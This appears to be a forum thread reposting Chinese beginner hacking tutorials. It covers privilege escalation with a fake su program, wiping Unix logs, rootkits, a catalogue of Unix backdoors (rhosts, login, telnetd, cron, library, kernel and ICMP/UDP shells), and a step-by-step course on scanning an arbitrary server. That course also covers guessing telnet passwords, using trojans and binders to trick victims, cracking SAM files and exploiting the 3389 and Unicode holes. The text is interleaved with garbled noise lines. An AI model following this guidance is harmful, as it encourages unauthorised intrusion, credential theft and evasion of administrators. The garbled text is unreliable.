* A4 f1 n3 g; X2 x
; g4 o9 r6 B+ y' a) [
另外需要获得的关于系统的信息就是一些与计算机本身没有关系的社会信息,例如网站所属公司的名称、规模,网络管理员的生活习惯、***号码等。这些信息看起来与攻击一个网站没有关系,实际上很多黑客都是利用了这类信息攻破网站的。例如有些网站管理员用自己的***号码做系统密码,如果掌握了该***号码,就等于掌握了管理员权限进行信息收集可以用手工进行,也可以利用工具来完成,完成信息收集的工具叫做扫描器。用扫描器收集信息的优点是速度快,可以一次对多个目标进行扫描。
% n8 P+ y9 _5 ?& h/ G1 X6 x
9 C( G1 P( }2 T: C/ s6 Z
攻击的实施阶段
9 O9 s+ p0 t6 ?; {
- [- j# `/ J9 _1 E5 Y4 T0 M4 q7 R1 d
1.获得权限
% l" B) i' _7 W- c2 ]3 H
/ i9 s- d @! y+ [ D% q
当收集到足够的信息之后,攻击者就要开始实施攻击行动了。作为破坏性攻击,只需利用工具发动攻击即可。而作为入侵性攻击,往往要利用收集到的信息,找到其系统漏洞,然后利用该漏洞获取一定的权限。有时获得了一般用户的权限就足以达到修改主页等目的了,但作为一次完整的攻击是要获得系统最高权限的,这不仅是为了达到一定的目的,更重要的是证明攻击者的能力,这也符合黑客的追求。
2 l% x% |& L1 v- Y
; h' {% L, {8 B# ^& A. z/ Z
能够被攻击者所利用的漏洞不仅包括系统软件设计上的安全漏洞,也包括由于管理配置不当而造成的漏洞。前不久,因特网上应用最普及的著名www服务器提供商Apache的主页被黑客攻破,其主页面上的 Powered by Apache图样(羽毛状的图画)被改成了Powered by Microsoft Backoffice的图样,那个攻击者就是利用了管理员对We erver用数据库的一些不当配置而成功取得最高权限的。
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:14
黑客初级技术讲解(中)
$ Q; N& t- p( u6 _8 {/ N% @9 }9 {
( q+ I( G, K) B) s+ i
当然大多数攻击成功的范例还是利用了系统软件本身的漏洞。造成软件漏洞的主要原因在于编制该软件的程序员缺乏安全意识。当攻击者对软件进行非正常的调用请求时造成缓冲区溢出或者对文件的非法访问。其中利用缓冲区溢出进行的攻击最为普遍,据统计80%以上成功的攻击都是利用了缓冲区溢出漏洞来获得非法权限的。关于缓冲区溢出在后面用专门章节来作详细解释。 U$ A7 h. h9 Q1 f
1 @2 X: r5 e2 O$ i& D( \* a
无论作为一个黑客还是一个网络管理员,都需要掌握尽量多的系统漏洞。黑客需要用它来完成攻击,而管理员需要根据不同的漏洞来进行不同的防御措施。了解最新最多的漏洞信息,可以到诸如Rootshell(www.rootshell.com)、Packetstorm(packetstorm.securify.com)、Securityfocus(www.securityfocus.com)等网站去查找。
, V$ z4 M' _* R f. {
9 O. h% F/ u9 x5 y1 J( w- {
2.权限的扩大
7 T |* t1 Y6 ]0 W0 z
5 b9 C; w6 M, l( `$ a
系统漏洞分为远程漏洞和本地漏洞两种,远程漏洞是指黑客可以在别的机器上直接利用该漏洞进行攻击并获取一定的权限。这种漏洞的威胁性相当大,黑客的攻击一般都是从远程漏洞开始的。但是利用远程漏洞获取的不一定是最高权限,而往往只是一个普通用户的权限,这样常常没有办法做黑客们想要做的事。这时就需要配合本地漏洞来把获得的权限进行扩大,常常是扩大至系统的管理员权限。
& R8 q) G/ z' y' K& W8 B3 v% Y" n4 |$ _
只有获得了最高的管理员权限之后,才可以做诸如网络***、打扫痕迹之类的事情。要完成权限的扩大,不但可以利用已获得的权限在系统上执行利用本地漏洞的程序,还可以放一些木马之类的欺骗程序来套取管理员密码,这种木马是放在本地套取最高权限用的,而不能进行远程控制。例如一个黑客已经在一台机器上获得了一个普通用户的账号和登录权限,那么他就可以在这台机器上放置一个假的su程序。一旦黑客放置了假su程序,当真正的合法用户登录时,运行了su,并输入了密码,这时root密码就会被记录下来,下次黑客再登录时就可以使用su变成root了。
" z* J+ d1 u, M* q0 w* M' N y( A6 E4 O2 w, L# E8 m
攻击的善后工作
8 |% w# T2 Q; J" u
3 S, P9 Y( B3 n/ o; J& z D* @9 I
1.日志系统简介
2 O2 y2 M$ M4 ~3 H1 s# ]% d2 |; K
7 G+ G# F& J& c) u6 U, y
如果攻击者完成攻击后就立刻离开系统而不做任何善后工作,那么他的行踪将很快被系统管理员发现,因为所有的网络操作系统一般都提供日志记录功能,会把系统上发生的动作记录下来。所以,为了自身的隐蔽性,黑客一般都会抹掉自己在日志中留下的痕迹。想要了解黑客抹掉痕迹的方法,首先要了解常见的操作系统的日志结构以及工作方式。Unix的日志文件通常放在下面这几个位置,根据操作系统的不同略有变化
' `# [ U6 b' |4 k7 u. s$ o
+ h" x; o2 O* ?3 z
/usr/adm——早期版本的Unix。
1 s8 |' A3 s7 }: ]0 S! A
/Var/adm新一点的版本使用这个位置。
) D Q/ I) h Z4 R
/Varflort一些版本的Solaris、 Linux BSD、 Free BSD使用这个位置。
" C' L) I8 o8 L2 G5 K
/etc,大多数Unix版本把Utmp放在此处,一些Unix版本也把Wtmp放在这里,这也是Syslog.conf的位置。
3 n4 T" C# x* [- j0 R5 z2 W1 C: o
: o" O+ [% ]8 M& G3 C: h
下面的文件可能会根据你所在的目录不同而不同:
$ `9 w% e! T! k3 F
( {+ L+ p5 s1 | 9 v& A/ p% e
acct或pacct-一记录每个用户使用的命令记录。
4 L2 L$ S0 [4 H- E( Z( _4 T
acce log主要用来服务器运行了NCSA HTTP服务器,这个记录文件会记录有什么站点连接过你的服务器。
! r5 |, a( A; L* G# n
aculo保存拨出去的Modems记录。
+ }& d# O+ F, x5 i9 ~
lastlog记录了最近的Login记录和每个用户的最初目的地,有时是最后不成功Login的记录。
5 S0 H @9 `/ m; {
loginlog一记录一些不正常的L0gin记录。
7 I1 q. k! T" q. j* N
me ages——记录输出到系统控制台的记录,另外的信息由Syslog来生成
6 j( x1 w- W' u! c4 x$ A1 v
security记录一些使用 UUCP系统企图进入限制范围的事例。
3 w ], `" e) ]) K- E( ^
sulog记录使用su命令的记录。
0 g7 h* S8 D- D5 ^ x( D2 Q& g- U9 g
utmp记录当前登录到系统中的所有用户,这个文件伴随着用户进入和离开系统而不断变化。
! r9 p* g( M2 y% F; H2 M A
Utmpx,utmp的扩展。
- d7 a: @! A* W2 v" _0 ~
wtmp记录用户登录和退出事件。
' j2 j$ W0 |- b* w! M7 r
Syslog最重要的日志文件,使用syslogd守护程序来获得。
" P0 o V' L6 K
" P' A' |! x2 A7 R# I
2.隐藏踪迹
$ K9 Q- N6 _5 n0 _$ R
' b' \! q6 p$ ~+ V8 v! F6 A1 Q- W
攻击者在获得系统最高管理员权限之后就可以随意修改系统上的文件了(只对常规 Unix系统而言),包括日志文件,所以一般黑客想要隐藏自己的踪迹的话,就会对日志进行修改。最简单的方法当然就是删除日志文件了,但这样做虽然避免了系统管理员根据IP追踪到自己,但也明确无误地告诉了管理员,系统己经被人侵了。所以最常用的办法是只对日志文件中有关自己的那一部分做修改。关于修改方法的具体细节根据不同的操作系统有所区别,网络上有许多此类功能的程序,例如 zap、 wipe等,其主要做法就是清除 utmp、wtmp、Lastlog和 Pacct等日志文件中某一用户的信息,使得当使用w、who、last等命令查看日志文件时,隐藏掉此用户的信息。
1 J, r" _, u2 ]! O* f
管理员想要避免日志系统被黑客修改,应该采取一定的措施,例如用打印机实时记录网络日志信息。但这样做也有弊端,黑客一旦了解到你的做法就会不停地向日志里写入无用的信息,使得打印机不停地打印日志,直到所有的纸用光为止。所以比较好的避免日志被修改的办法是把所有日志文件发送到一台比较安全的主机上,即使用loghost。即使是这样也不能完全避免日志被修改的可能性,因为黑客既然能攻入这台主机,也很可能攻入loghost。
/ i4 Q" i: B+ w5 {% }1 O
! d, Z2 R( t1 d% \
只修改日志是不够的,因为百密必有一漏,即使自认为修改了所有的日志,仍然会留下一些蛛丝马迹的。例如***了某些后门程序,运行后也可能被管理员发现。所以,黑客高手可以通过替换一些系统程序的方法来进一步隐藏踪迹。这种用来替换正常系统程序的黑客程序叫做rootkit,这类程序在一些黑客网站可以找到,比较常见的有LinuxRootKit,现在已经发展到了5.0版本了。它可以替换系统的ls、 、netstat、inetd等等一系列重要的系统程序,当替换了ls后,就可以隐藏指定的文件,使得管理员在使用ls命令时无法看到这些文件,从而达到隐藏自己的目的。
+ c/ t( O( g* x x. q
6 s' s( x8 M" f4 e$ q8 K
3.后门
# V/ P8 ?5 ?2 ? |& e4 Z2 ~, l" A @1 Q ^' Z5 s0 X! e% o
一般黑客都会在攻入系统后不只一次地进入该系统。为了下次再进入系统时方便一点,黑客会留下一个后门,特洛伊木马就是后门的最好范例。Unix中留后门的方法有很多种,下面介绍几种常见的后门,供网络管理员参考防范。
; o/ s# e8 M) y( H) M, v
7 ]; D4 {! [0 A) I3 J5 s
1密码破解后门
' f; }; S, O/ Y: ^5 A* o# O/ r
这是入侵者使用的最早也是最老的方法,它不仅可以获得对Unix机器的访问,而且可 以通过破解密码制造后门。这就是破解口令薄弱的帐号。以后即使管理员封了入侵者的当前帐号,这些新的帐号仍然可能是重新侵入的后门。多数情况下,入侵者寻找口令薄弱的未使用帐号,然后将口令改的难些。当管理员寻找口令薄弱的帐号是,也不会发现这些密码已修改的帐号。因而管理员很难确定查封哪个帐号。
) P4 P. U( c0 p) Z, X+ r0 w
# B. |0 }8 w% _1 s- P9 u+ r
2Rhosts + + 后门
. i9 o* X( A0 i( B$ E+ ^
在连网的Unix机器中,象Rsh和Rlogin这样的服务是基于rhosts文件里的主机名使用简 单的认证方法。用户可以轻易的改变设置而不需口令就能进入。 入侵者只要向可以访问的某用户的rhosts文件中输入+ +,就可以允许任何人从任何地方无须口令便能进 入这个帐号。特别当home目录通过NFS向外共享时,入侵者更热中于此。这些帐号也成 了入侵者再次侵入的后门。许多人更喜欢使用Rsh,因为它通常缺少日志能力. 许多管理员经常检查 + +,所以入侵者实际上多设置来自网上的另一个帐号的主机名和 用户名,从而不易被发现。
0 ?# ^ c- z* A! r1 j I1 i
6 P: R6 O9 }% u0 {& A. o5 B) u) I f
3校验和及时间戳后门
3 ]; h# M9 h) X6 ~' y/ B/ `/ y
早期,许多入侵者用自己的trojan程序替代二进制文件。系统管理员便依靠时间戳和系 统校验和的程序辨别一个二进制文件是否已被改变,如Unix里的sum程序。入侵者又发展了使trojan文件和原文件时间戳同步的新技术。它是这样实现的: 先将系统时钟拨 回到原文件时间,然后调整trojan文件的时间为系统时间。一旦二进制trojan文件与 原来的精确同步,就可以把系统时间设回当前时间。Sum程序是基于CRC校验,很容易 骗过。入侵者设计出了可以将trojan的校验和调整到原文件的校验和的程序。MD5是被 大多数人推荐的,MD5使用的算法目前还没人能骗过。
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:14
黑客初级技术讲解(下)
( K5 ^3 P. I. M! c, r
- t, g; a2 n) N
0 z: }/ N1 N9 A- {
4Login后门
) Z. K: ]/ F3 [5 T
在Unix里,login程序通常用来对telnet来的用户进行口令验证. 入侵者获取login.c的 原代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门 口令,它将忽视管理员设置的口令让你长驱直入。这将允许入侵者进入任何帐号,甚至 是root。由于后门口令是在用户真实登录并被日志记录到utmp和wtmp前产生一个访问 的,所以入侵者可以登录获取shell却不会暴露该帐号。管理员注意到这种后门后,便 用命令搜索login程序以寻找文本信息. 许多情况下后门口令会原形毕露。入侵者就开始加密或者更好的隐藏口令,使strings命令失效5Telnetd后门
3 _% x' v7 D7 I5 y: }
当用户telnet到系统,***端口的inetd服务接受连接随后递给in.telnetd,由它运行 login.一些入侵者知道管理员会检查login是否被修改,就着手修改in.telnetd. 在in.telnetd内部有一些对用户信息的检验,比如用户使用了何种终端. 典型的终端 设置是Xterm或者VT100.入侵者可以做这样的后门,当终端设置为letmei quot;时产生一 个不要任何验证的shell. 入侵者已对某些服务作了后门,对来自特定源端口的连接产 生一个shell。
7 `# z1 \0 X5 X4 o/ b4 O1 `
0 m/ r" ~8 i# F6 f# j3 }5 a% H; a1 S
6服务后门
9 K1 N) O0 A7 i+ {7 q, f4 W
几乎所有网络服务曾被入侵者作过后门. Finger,rsh,rexec,rlogin,ftp,甚至 inetd等等的作了的版本随处多是。有的只是连接到某个TCP端口的shell,通过后门口令就能获取访问。这些程序有时用刺娲□?Ucp这样不用的服务,或者被加入inetd.conf 作为一个新的服务,管理员应该非常注意那些服务正在运行,并用MD5对原服务程序做校验。
. r" T# K% g, l9 L$ z
; i5 q4 Z6 A6 h0 g1 A
7Cronjob后门
7 }5 u: a5 X5 \& a
Unix上的Cronjob可以按时间表调度特定程序的运行。入侵者可以加入后门shell程序 使它在1AM到2AM之间运行,那么每晚有一个小时可以获得访问。也可以查看cronjob中 经常运行的合法程序,同时置入后门。
* y" z8 H" q& ^: F
5 k' a6 Z* E" W/ }, {, U
8库后门
+ B% @( _; ^! A/ P. [( Y
几乎所有的UNIX系统使用共享库,共享库用于相同函数的重用而减少代码长度。一些入侵者在象crypt.c和_crypt.c这些函数里作了后门;象login.c这样的程序调用了 crypt()。当使用后门口令时产生一个shell。 因此,即使管理员用MD5检查login程序,仍然能产生一个后门函数,而且许多管理员并不会检查库是否被做了后门。对于许多入侵者来说有一个问题: 一些管理员对所有东西多作了MD5校验,有一种办法是入侵者对open()和文件访问函数做后门。后门函数读原文件但执行trojan后门程序。所以 当MD5读这些文件时,校验和一切正常,但当系统运行时将执行trojan版本的,即使trojan库本身也可躲过MD5校验,对于管理员来说有一种方法可以找到后门,就是静态编连MD5校验程序然后运行,静态连接程序不会使用trojan共享库。
3 z. I* v" ]$ x
0 V# k0 m7 G" g- U
9内核后门
+ G7 U0 ?# z8 |& C/ ^+ n' j3 z8 g5 F
内核是Unix工作的核心,用于库躲过MD5校验的方法同样适用于内核级别,甚至连静态 连接多不能识别. 一个后门作的很好的内核是最难被管理员查找的,所幸的是内核的 后门程序还不是随手可得,每人知道它事实上传播有多广。
5 [- ]# H7 I# x% Z& L
/ o$ {9 J. F9 b# u
10文件系统后门
3 Q- N" e9 j+ u. N
入侵者需要在服务器上存储他们的掠夺品或数据,并不能被管理员发现,入侵者的文章常是包括exploit脚本工具,后门集, iffer日志,email的备分,原代码,等等!有时为了防止管理员发现这么大的文件,入侵者需要修补l quot;,du,fsck以隐匿特定的目录和文件,在很低的级别,入侵者做这样的漏洞: 以专有的格式在硬盘上割出一部分,且表示为坏的扇区。因此入侵者只能用特别的工具访问这些隐藏的文件,对于普通的管理员来说,很难发现这些坏扇区里的文件系统,而它又确实存在。 A/ E1 E; V3 d6 b* e
# N! H! [9 P4 z9 F
11Boot块后门
3 V% P) k' v5 A
在PC世界里,许多病毒藏匿与根区,而杀病毒软件就是检查根区是否被改变。Unix下,多数管理员没有检查根区的软件,所以一些入侵者将一些后门留在根区。
; `/ M2 G6 T! T
. 所以更多的管理员是 用MD5校验和检测这种后门的。
, v; _: o8 r8 G
12隐匿进程后门
! [- U U6 m, `2 x
入侵者通常想隐匿他们运行的程序,这样的程序一般是口令破解程序和***程序 ( iffer),有许多办法可以实现,这里是较通用的: 编写程序时修改自己的argv[] 使它看起来象其他进程名。可以将 iffer程序改名类似in.syslog再执行,因此 当管理员用检查运行进程时,出现 的是标准服务名。可以修改库函数致使 不能显示所有进程,可以将一个后门或程序嵌入中断驱动程序使它不会在进程表显现。使用这个技术的一个后门例子是
4 p% H7 k8 e/ s# |( a
7 }# A; J4 N* ^* n6 q& b
amod.tar.gz :
% E' ]0 N! w! W, t- \* k
网络通行. 这些网络通行后 门有时允许入侵者通过防火墙进行访问。有许多网络后门程序允许入侵者建立某个端 口号并不用通过普通服务就能实现访问. 因为这是通过非标准网络端口的通行,管理 员可能忽视入侵者的足迹. 这种后门通常使用TCP,UDP和ICMP,但也可能是其他类型报文。
, B- F! T8 l- q3 @
( m/ I( G5 m8 B3 w
14TCP Shell 后门
4 c- o$ l% Z% Q- {* i" Z- H2 p
入侵者可能在防火墙没有阻塞的高位TCP端口建立这些TCP Shell后门. 许多情况下,他 们用口令进行保护以免管理员连接上后立即看到是shell访问. 管理员可以用netstat 命令查看当前的连接状态,那些端口在侦听,目前连接的来龙去脉. 通常这些后门可 以让入侵者躲过TCP Wra er技术. 这些后门可以放在SMTP端口,许多防火墙允许 e-mail通行的.
' [. W7 v3 w. s/ ?- Q/ I. g7 S6 c
" h& i6 l% \4 l
15UDP Shell 后门
. q5 f. e+ H4 U2 L
管理员经常注意TCP连接并观察其怪异情况,而UDP Shell后门没有这样的连接,所以 netstat不能显示入侵者的访问痕迹,许多防火墙设置成允许类似DNS的UDP报文的通行,通常入侵者将UDP Shell放置在这个端口,允许穿越防火墙。
% t( F3 B% l% T
! g. j0 T0 @4 l2 r. d5 {' n
16ICMP Shell 后门
+ S. S, B4 X% h* a
Ping是通过发送和接受ICMP包检测机器活动状态的通用办法之一。许多防火墙允许外界ping它内部的机器,入侵者可以放数据入Ping的ICMP包,在ping的机器间形成一个shell通道,管理员也许会注意到Ping包暴风,但除了他查看包内数据,否者入侵者不会暴露。
7 z! @* j' q5 a: l1 ^" k
: U( ]0 G+ n% i5 E* a8 g2 L5 ~
17加密连接
3 u. l" y) W# A
管理员可能建立一个 iffer试图某个访问的数据,但当入侵者给网络通行后门加密 后,就不可能被判定两台机器间的传输内容了。
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:14
基础知识(1)
3 ?5 g9 l/ ?* S) }6 K: ^
" i* U* N! W4 I0 h9 h
; k7 J2 J; o# Y5 v% _
我认为这是一套适合初学者由浅到深的文章,所以强烈推荐给大家,作者从基础讲到最近比较火的漏洞,可能有些人看来是浅了些,但是的确很适合想干点啥但又不知道怎么办的菜鸟们 。
* v$ a: c) \8 ~; n$ V( k) V
5 Q% a5 M9 p- q* d. A# E7 U
第一节,伸展运动。这节操我们要准备道具,俗话说:“工欲善其事,必先利其器”(是这样吗?哎!文化低……)说得有道理,我们要学习黑客技术,一点必要的工具必不可少。 C* Q3 y: g, y4 x( s8 P
: l- w8 g+ x4 }& T3 ^
1,一台属于自己的可以上网的电脑。这样你可以有充分的支配权,上网不用说,否则你怎么看到我的文章?wap?呵呵!属于自己很重要,否则安全性是个很大的问题。第一点相信大家没有问题。
9 A* |0 I. @8 ^" ~
0 P0 N: ]/ e8 ~! L
2,windows2000/nt,别和我说98/me,他们是你们同学用来玩游戏的!(当然,我也是铁杆game fan)对网络支持极差,命令受限制,很多软件又不能用,对黑客来说使用起来绊手绊脚,非常不利。这里我推荐2000,这是一个很成熟的系统(漏洞还是有一堆)。推荐双系统,这样黑玩搭配,干活不累。
$ q& F2 b* S1 s6 J4 [ C( B
' H& i) _% o8 m1 n) n, G4 V- f
3,冰河。中国第一木马,中者数不胜数,国人骄傲。虽然用冰河根本不能算黑客,但它确实能培养你对黑客的兴趣,同时帮助你了解网络,相信很多黑客同学都是这样起步的。静止写的那篇冰河教程很不错,大家仔细看看。而且,以后你学会入侵服务器后,用冰河操作也会减少工作量(我是懒虫,爽!)
* j) \0 \3 I* b# a
5 a' |$ j3 ?6 U J+ l
4,oicq。我们学黑客,可不是学泡mm!bfctx你………… 息怒息怒!我们当然是学黑客,但不要忘了,众人拾柴火更高,我们通过cshu的成员列表,互相联系帮助,对提高水平很有帮助!另外我要废话一句:据我了解,现在黑客网站下载最多的都是针对oicq的破解工具,我个人认为很无聊,偷个密码代表什么,浪费时间!最后补充:mm不能不泡。(谁砸我??!!)
; h) ]* k/ B" O6 a
) H U Y! q9 L7 ?9 U
5,superscan。很好用的端口扫描器,速度超快,功能一流,一旦拥有,别无所求……(打住!)不论是找木马受害者,还是扫服务器端口,它都非常有效,cshu强烈推荐!
6 u' Z2 l: ~* l1 m1 x$ c
# c6 c' R' x" u& X
6,一本笔记本/便条,网上资料相当多,黑客处理的也是非常之多。良好的习惯决定了你的效率,准备一本笔记本,记录下你的成果,肉鸡,木马利用,命令,密码……坚持一下,你会发现你的效率大幅上升的!
' _$ j {: }& @" u6 a9 M; S, m0 A( a
, H5 K0 K. {! H2 |) U+ X+ V1 B
7,lc3.著名nt/2000sam破解程序,有时我们拿不到足够权限,又没好办法,那么lc3是最好的解决办法,只要你拿的到sam,你就是服务器它爷爷!本站有其破解程序,支持了暴力破解!
7 ~$ T3 M: \. e1 |) R, G" n7 C
3 a7 K% q( v! p- l" c: m0 p
8,程序合并。这是玩木马必需的,虽然木马是很低的手段,但有时配合巧办法(以后我会介绍)确实能够达到意想不到的效果,朋友们可以在空闲时玩玩木马,很有趣,若你能巧妙的骗过mm,那么webmaster也可能被你骗倒:〉 (比较理想化)
# c6 [$ z, I9 v1 Q
! G4 J1 ] i8 o) D2 s
9,流光4for 2000/nt。可能是世界上最好的综合类黑软!中国的骄傲,它集成了很全的漏洞信息,速度快,方法多,对有漏洞的主机是毁灭性的打击,操作又方便,是快速黑站必不可少的精品工具。超级吐血推荐!!
" `/ ~, i9 H7 a1 _
- T( i& q& g Z) ]( }. e- w" q
10,良好的心态,稳定的情绪,刻苦钻研的精神,刨根问底的作风,打扫房间的习惯。黑客是门很高深的学问,不要幻想一步登天,失败是常有的事,千万不可灰心。在那么多黑软的包围下,切不可完全依赖他们,一定要了解它们利用什么原理工作。对任何一个小问题,小细节,一定要问清楚,cshu就是给大家互相交流的场所哦!黑完后不要得意忘形,打扫战场也很重要,以防万一。 f2 M* Q5 ~3 F& M; }
2 o1 ]; I5 n2 z% ?5 y
第一节操完,可能很无聊,我就这点水平,大家见谅!这里我说一句大话:做完菜鸟操,包你会黑简单的站(哎哟!心慌了!)
$ z5 J- R, @# C8 f
( b5 k8 M2 i# z! V$ x" H
下一节操我们要介绍如何掌握一台主机的基本信息,期待中……
2 m6 f# E& Z$ S5 W
$ O+ d+ n6 C/ d. R. G' k$ P
真是太对不起大家了,隔了那么久才写这篇教程,我这几天实在太忙,大家还是体谅一下我吧,好了,开始做操。
; u6 {& i6 u$ w9 s9 R2 |- h" [
4 F& r( X, W* }- s8 [0 N0 T
今天的内容是获得主机的信息。 我们要黑一台主机,首先要了解它的信息,包括它的类型,用户列表,目录,端口,漏洞等等。
5 J! A) e2 j& z" e2 L$ Q: F
0 M# ^* G+ e' K. ~
首先我们我们要找一台主机来练手,随便挑吧!
(乱说的)
, @( t" w2 B' I1 j
! u% d0 W2 o4 F r9 u+ C' P9 ^
第一部,呵呵,先在ie里看看吧,mmmm.....做的还行,挺精致的!主要是我们肯定了它现在是正常的。 然后,我们应该知道它的ip,很简单,ping它一下就可以了。
) N1 z4 H2 h* a# M5 m% ^; t( Y
4 T f9 a4 M" t$ Z$ F6 z7 `
,看看窗口里有了什么?是不是有三行回应,其中的111.111.222.222就是ip了(还是胡说的,一个例子)。有人是不是要问,我这里怎么没有。那可能是两个原因,第一,你打错命令了;第二,该主机装了防火墙,禁止ping,不过这种可能很小。
2 W! W# Y3 V' z
: u7 }5 O+ Z9 o
知道了ip,下一步应该确定端口了。下面是一些常用的端口的默认值
- ?" g/ C- d9 d" b
% n5 S* `, S: r- p7 q
21--ftp 重要哦
. h0 k- v! ?3 }6 X1 ] S+ @8 t! Q
, C [9 F0 Y9 z; O( ^ }
23--telnet 欢呼吧
: \0 K$ u( O# D( r! d# g
1 V9 R o: w' U, [# W
25-smtp 尽管重要,但似乎没什么可利用的
7 Z( A8 y( J8 z7 i" W+ A7 Y
4 |) g2 m6 a5 h8 H6 A2 `
53--domain 同上
0 T; m' J2 u; G1 Q$ Z _7 x
" w$ i4 |; q" B3 Z
79--finger 可知道用户信息了
/ e7 Z" p! Q" a4 ?9 {
; w4 a, f; C4 A
80--http 要看网页,没它不行吧
- \6 t7 n0 X2 n2 }! K: x( m5 D
% H1 c0 E$ i: q C1 W* G- c
110--pop 收信的
: C2 r) z3 _$ S- j4 N6 C9 q
& |* f& h5 J( n3 i8 g
139--netbios 共享用的,很有利用价值哦
" N- `9 m7 _1 o: \0 x5 m
8 q( i4 j3 o# u5 d! x
3389--win2000超级终端 呵呵,这个好!
) a- }: G: Z5 r$ s) i4 g5 k$ L2 f m
& Z# E# m W+ J' {* i5 ^6 z$ m" u
其实端口有上千种,这些最最常用
0 d7 H# g1 G8 n- Y
6 v Y) S0 `) H
我们怎么知道服务器有什么端口打开呢??去找个扫描器吧,x-scan ,super scan,flux等等很多哦。这里我推荐super scan ,速度很快,本站也有其教程哦!用法还是比较傻瓜的,估计大家不会有问题,轻轻几点,打开的端口就出现了。不错不错,上面说到的都有(太理想化了吧!)
# K8 G6 I6 L V3 K
9 G! \. h% N& N% N& z1 w
那么我们该如何应对呢?
- z9 ~" m( Q8 S' k, g6 E) ]4 c
2 f% i* h8 b% M# Q :忘了说一声,顺便扫一下7626,冰河有也说不准哦:) C2 B. i- L4 m: p6 F. P) v2 x' F' S
; q$ n- k' t5 \% L
若有ftp,那就用用匿名登陆。自己动手也行,最好用x-scan flux等吧!反正,有ftp就有一份希望
( v' t: q' n! X
/ y& o3 b, ^& O9 A% @; L
telnet在!好!telnet 111.111.222.222,出现窗口了吧!嗯?要密码?看来网管还不是超级注意文明用语:)随便猜个,错了,闪人!
$ Q3 t" n, V5 ]# A- h
6 G( b$ B! `7 `" M* Y0 f/ k
smtp,看着它,无奈
' V2 ]" n5 S. W
/ @! j- {& f2 I7 N# T
domain,一般它带了局域网了
3 Y$ O$ T4 ], u O
9 c K% I8 j Y* [% ? z4 \5 j
finger 可以知道用户列表了,不好,忘了用法了,幸好finger很少出现 J' ~% @4 E$ E9 }% n# J
% H% C/ |3 _( O; W ~
80肯定在,我们等会来对付它
+ x9 x8 }2 W$ F
- u+ m* X& R) g4 O
110 有smtp,pop在也不奇怪了
- q$ q% _ x+ n% A# D
: z1 \7 x# [7 Y
139 找个扫描器来找找有没有露在外面的共享吧,日后也用得着
# q7 e' K" ]! b: @2 ~8 ~
- W1 m; r) v0 `9 j2 d
3389 太太太好了!!打开客户端吧,用输入法漏洞试试,成了就干了它!不成也没事,我们以后完全控制它3389会很方便的。
. t- P5 o& [) X; f
+ R8 H, H3 s" X2 N$ S* k) b# j
端口扫完了!我们在多了解它一点吧!追捕大家都知道吧,其实用它获取主机信息也不赖哦。打开追捕,输入ip,选择智能追捕,是不是有很多信息出来了?虽然不能直接利用,但毕竟我们有对它有了进一步的了解。
8 X# h; ~ }4 F5 A
. e# D" D8 j, b2 c; y2 w# q, `5 j
掌握了那么多信息,我们该做点什么了,一般黑客入侵都是靠着系统漏洞,不会都傻傻地去暴力破解的。我们现在就要看看它有什么漏洞。
6 F% m9 J5 F6 t4 t
, `3 o( y' I4 T) y+ ~8 L
对漏洞大家可能不太了解,我这里也不能一一说明了,太多了,感兴趣的话去论坛找freedom吧!
( k1 h& y5 C) {
1 i7 s6 T# z. t! f
目前广泛利用和存在的漏洞有:unicode,unicode后续,iis溢出,.idq,.frontpage extend,输入法漏洞等等大漏洞。 至于如何确定,呵呵,绝对不会是一行一行地在ie中试吧,拿出x-scan吧,很好的扫描器哦!
8 P! c! d4 _/ }5 [# I
3 T9 [3 ]2 T6 P. m. \
稍微设置一下就上路吧!过了一会,呵呵,报告出来了,快看,哇!漏洞一大堆!这下赚了!各条漏洞都有详细的信息,大家看吧,总比我说的准了。
- M# C; D: s6 f. m0 U
; y8 W5 I1 y$ y" ]" Y1 e
现在这台主机已经和我们成为亲戚了,要让这位亲爱的亲戚做点事,就要开始各种攻击了,下回我们就探讨一下最最可爱的unicode漏洞,各位可能就会在unicode中完成第一次黑客体验,再见:)
当前离线
81888 帖子
624 精华
3287 阅读权限
90 在线时间
10 小时 注册时间
2006-9-4 最后登录
2010-6-5 TW技术CTO
624 精华
3287 最后登录
2010-6-5 发表于 2007-10-9 15:14
基础知识(2)
8 Q) Z8 ^' j: X4 D
9 g/ b7 C/ [1 Y0 M
3 q& L1 V! h* z7 r, g, K9 t
今天我们谈谈unicode漏洞,这可是基础中的基础,重点里的重点,不懂的一定要好好学。
# I" ^1 J7 Q8 m, _! }) n
* N" o& s9 H2 x: t
2000年10月17日中联绿盟发布了以下的安全公告:
+ c/ f. u7 u, J. I6 i; A
* U: M( T/ G* A, E
微软IIS 4.0 / 5.0 扩展UNICODE目录遍历漏洞
2 J, Z" ?! F+ L0 m; Z+ ]5 j2 C
1 l6 x9 Y, |, |; U
远程漏洞:是
, B7 L) ~$ p" i
0 O# {* I$ B* n( d7 _3 u! o* J
本地漏洞:是 W* _/ @, j1 c; D8 n# E
. o/ {' {. W3 q% i! B6 t
发布日期:2000年10月17日
4 I3 V8 C7 o ?5 Z, J0 j- J- Y
/ o5 C. ^0 a7 y3 k
更新日期:2000年10月17日
' t$ |# I k+ p$ x6 _. c
' u0 q; m$ C/ T5 ]/ k/ _
受影响的版本:
3 l1 I: R3 B, l- d9 n" @
; h- b7 M3 U) s
Microsoft IIS 5.0 + Microsoft Windows NT 2000 Microsoft IIS 4.0 + Microsoft Windows NT 4.0 + Microsoft BackOffice 4.5 - Microsoft Windows NT 4.0 + Microsoft BackOffice 4.0 - Microsoft Windows NT 4.0
* m( F- z4 m% Z" Z( ^; q
9 W; F0 p! J6 I
这可是中国乃至全球网络安全界的一次大变节,入侵nt/2000系统变得如此简单,不打补丁的死路一条。
: b% W; |" Q1 V( n" }
' m C- d) }: {0 I4 j0 x
下面开始正式学习:
8 F0 K; `3 C# o; P4 [1 M
1 {9 o; ?2 K, C
一,UNICODE漏洞的原理
9 s- M6 r! Q% ~$ m5 P$ Z8 h
